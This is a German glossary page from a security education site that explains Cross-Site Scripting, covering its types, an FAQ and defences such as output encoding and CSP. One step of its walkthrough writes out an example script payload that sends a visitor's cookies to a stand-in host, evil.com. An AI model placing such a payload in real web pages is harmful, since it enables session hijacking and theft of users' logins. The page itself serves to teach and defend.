S
sicherheit.ai
KI-Sicherheit & Cybersecurity
_
Angriff

Cross-Site Scripting

Abkürzung: XSS

Angriffstechnik, bei der Angreifer bösartigen JavaScript-Code in Webseiten einschleusen, der dann im Browser anderer Nutzer ausgeführt wird.

🧒
Einfach erklärt
Für jeden verständlich — ohne Vorkenntnisse

Stell dir vor, du schreibst auf einer Webseite einen Kommentar — aber statt Text schreibst du heimlich einen Befehl. Wenn andere Nutzer die Seite öffnen, führt ihr Browser diesen Befehl aus, ohne es zu merken. So kann ein Angreifer deine Passwörter klauen, ohne dich direkt anzugreifen.

Ausführliche Erklärung

XSS-Angriffe unterteilen sich in drei Typen: Stored XSS (Code wird dauerhaft in der Datenbank gespeichert), Reflected XSS (Code wird über URL-Parameter zurückgespiegelt) und DOM-basiertes XSS (Manipulation des Document Object Model ohne Serverkontakt). Angreifer können so Session-Cookies stehlen, Keylogger einschleusen, Phishing-Formulare einblenden oder Nutzer auf bösartige Seiten weiterleiten. XSS zählt seit Jahren zu den OWASP Top 10 Schwachstellen.

>Wie funktioniert das?

1

Angreifer findet ein Eingabefeld (Kommentar, Suche, Profil), das Benutzereingaben ungefiltert ausgibt

2

Er schreibt JavaScript-Code in dieses Feld (z.B

3

<script>document.location='evil.com/steal?c='+document.cookie</script>)

4

Wenn ein anderer Nutzer die Seite lädt, führt sein Browser den Code aus

5

Cookies, Tokens oder Tastatureingaben werden an den Angreifer gesendet

6

Angreifer übernimmt die Session des Opfers.

?Häufig gestellte Fragen
Antwort

Jede Webanwendung, die Nutzereingaben ohne ausreichende Validierung und Ausgabe-Kodierung verarbeitet — vom kleinen Blog bis zum Online-Banking-Portal.

Antwort

Bei Stored XSS wird der Schadcode dauerhaft auf dem Server gespeichert und bei jedem Seitenaufruf ausgeführt. Bei Reflected XSS wird der Code nur einmalig über einen manipulierten Link zurückgespiegelt.

Antwort

Zum Stehlen von Session-Cookies, Umleiten von Nutzern, Einblenden gefälschter Login-Formulare, Verbreiten von Malware und Ausführen von Aktionen im Namen des Opfers.

Antwort

Weil korrekte Ausgabe-Kodierung in komplexen Webanwendungen mit vielen Eingabepunkten schwer konsistent umzusetzen ist und Entwickler oft nicht alle Kontexte (HTML, JS, CSS, URL) richtig absichern.

Antwort

Durch konsequentes Output-Encoding, Content Security Policy (CSP) Header, HttpOnly-Flag für Cookies, Eingabevalidierung auf Server- und Clientseite sowie regelmäßige SAST/DAST-Tests.

Quick Facts
KategorieAngriff
AbkürzungXSS
Verwandte Begriffe4
← Zurück zum Glossar
Alle Begriffe im Glossar
APTBrute-Force-AngriffBotnetCVECredential StuffingDDoSEDRFirewallHoneypotIDSKI-Angriff (Adversarial AI)Lateral MovementLLM-SicherheitMalwareMFANetzwerksegmentierungOSINTPasskeysPatch ManagementPhishingPrompt InjectionRansomwareSIEMSocial EngineeringSQL-InjectionThreat IntelligenceTTPWAFXDRZero-DayZero TrustXSSCSRFMitMSupply-Chain-AngriffSpear-PhishingVishingSmishingWatering-Hole-AngriffDrive-by-DownloadInsider-BedrohungTyposquattingClickjackingDNS-SpoofingSession-HijackingBECCryptojackingSIM-SwappingSOCPentestThreat HuntingRed TeamBlue TeamDevSecOpsSecurity Awareness TrainingVulnerability ManagementSASTDAST3-2-1 Backup-StrategieCyber-VersicherungNIS2DSGVOISO/IEC 27001BSI IT-GrundschutzNIST CSFKRITIS — Kritische InfrastrukturenPCI-DSSCRATISAX — Automotive InformationssicherheitBCMMeldepflicht bei DatenpannenAdversarial Machine LearningModel PoisoningDeepfakeKI-HalluzinationLLM-JailbreakFederated LearningShadow AITrojanerComputerwurmSpywareRootkitKeyloggerFileless MalwareBackdoorInfostealerWiperwareAdwareOAuth 2.0SAMLSSOPAMIAMRBACPasswort-ManagerBiometrische AuthentifizierungHardware-SicherheitsschlüsselVPNDMZVLANPort-ScanningBGP-HijackingIPSNACTLSSSHHTTPS — HyperText Transfer Protocol SecureSPF, DKIM & DMARC — E-Mail-AuthentifizierungIPsec — Internet Protocol SecurityAPI-SicherheitDNSSEC